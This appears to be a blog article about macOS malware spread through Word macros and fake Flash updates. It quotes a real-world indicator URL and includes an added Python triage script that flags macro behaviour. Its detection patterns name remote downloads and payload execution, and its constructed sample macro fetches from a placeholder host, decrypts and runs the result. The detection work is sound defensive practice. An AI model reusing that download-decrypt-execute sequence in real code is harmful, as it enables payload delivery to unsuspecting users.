New macOS malware exploits old Windows tricks to get into your system.
One of the many things that Apple devotees tout about their preferred technology is the perceived scarcity of malicious software targeting the operating systems in Apple’s ecosystem. Whether it’s for Mac or the mobile App Store, the Cupertino company’s strict control over who can write and sell software for its hardware has admittedly kept the number of viruses – and just plain lousy programs and apps – to a minimum.
But a new threat to macOS proves that it can be done, and that the best way to infect an Apple device is to pretend it’s running Windows. Two newly discovered viruses targeting macOS machines rely on old favorites like Word macros and phony software updates to spread malicious code, mechanisms that Windows users have long been warned about.
Macro-based attacks actually fell out of favor some time ago, due to growing consumer awareness that opening attachments in emails could potentially harm your computer (or, as the joke goes, destroy everything you love). Around the same time, emailed links that downloaded viruses proved more effective and looked more trustworthy to recipients. As an added behavioral benefit for the attacker, getting a hapless victim to click a link was also easier than convincing them to open a slow-loading attachment.
But now that the warnings against clicking unexpected links have made headway – and now that a younger generation of users who weren’t schooled in the “never open an attachment” line of thinking has grown up – hackers are back to deploying viruses and other malware through macros. It’s believed a macro-based attack was responsible for a large-scale power grid takedown in 2015.
Security researchers have now identified what might be the first known Mac-based attack that relies on this old Windows standby. According to an article from Ars Technica, “The attack was found in a Word file titled ‘U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.’ When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- checks to make sure the LittleSnitch security firewall isn’t running
- downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- decrypts the payload using a hard-coded key and
- executes the payload
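The four steps quoted above are exactly the kind of behaviour a defender can triage for before a document ever reaches a user. The following Python is an added example, not code from the original article or from the researchers it cites: a small heuristic scorer run over already-extracted VBA macro source (extracting the source from a .doc/.docm with a tool such as oletools’ olevba is assumed). The indicator names, weights, threshold and the two sample macros are constructed for illustration; the malicious sample only mimics the reported sequence with placeholder function names and does nothing real.

```python
"""Heuristic triage of extracted VBA macro source for the behaviour pattern
reported above: auto-execution, a security-tool check, a remote download,
decryption with a hard-coded key, and execution of the result.

Added example; indicators, weights and sample text are constructed."""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Patterns are deliberately broad triage heuristics,
# not signatures for any specific document; tune weights to your environment.
INDICATORS = [
    ("auto_execute",
     re.compile(r"\bSub\s+(AutoOpen|Document_Open|Workbook_Open)\b", re.I), 2),
    ("security_tool_check",
     re.compile(r"little\s*snitch", re.I), 3),
    ("remote_download",                      # plain and defanged (hxxp) URLs
     re.compile(r"h(?:tt|xx)ps?://|URLDownloadToFile|XMLHTTP|\bcurl\b", re.I), 3),
    ("decrypt_with_key",                     # cipher/decrypt call that names a key
     re.compile(r"\b(?:RC4|AES|Xor|Decrypt)\b.*\bkey\b", re.I), 2),
    ("execute_payload",
     re.compile(r"\b(?:Shell|MacScript|AppleScriptTask|CreateObject)\b", re.I), 2),
]


@dataclass
class TriageResult:
    score: int
    hits: list = field(default_factory=list)
    suspicious: bool = False


def triage_macro(source: str, threshold: int = 6) -> TriageResult:
    """Score macro source by which indicators fire; flag it at or above threshold."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return TriageResult(score=score, hits=hits, suspicious=score >= threshold)


# Constructed sample mimicking the reported sequence. IsRunning, FetchURL and
# Decrypt are placeholder names, not real VBA or macOS APIs.
SAMPLE_MALICIOUS = """
Sub AutoOpen()
    If Not IsRunning("Little Snitch") Then
        blob = FetchURL("hxxps://example.invalid/index.asp")
        payload = Decrypt(blob, key)
        MacScript payload
    End If
End Sub
"""

# Constructed benign sample: a formatting helper with none of the indicators.
SAMPLE_BENIGN = """
Sub FormatHeader()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        r = triage_macro(src)
        print(f"{label}: score={r.score} suspicious={r.suspicious} hits={r.hits}")
```

Keyword scoring like this is a triage filter, not a verdict: it is meant to route macro-enabled documents to sandboxing or analyst review, and the weights deliberately favour the combination of indicators (download plus decrypt plus execute) over any single one.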
The Next Web also highlighted another form of attack that was once only a headache for Windows users: the fake download of otherwise important software. A popup box telling you to click here to update your Adobe Flash Player, for example, was actually installing malicious code instead. This type of attack has already been discovered affecting macOS systems.
Here at FileHippo we have the very latest Mac and PC security and anti-virus software available for you to download now!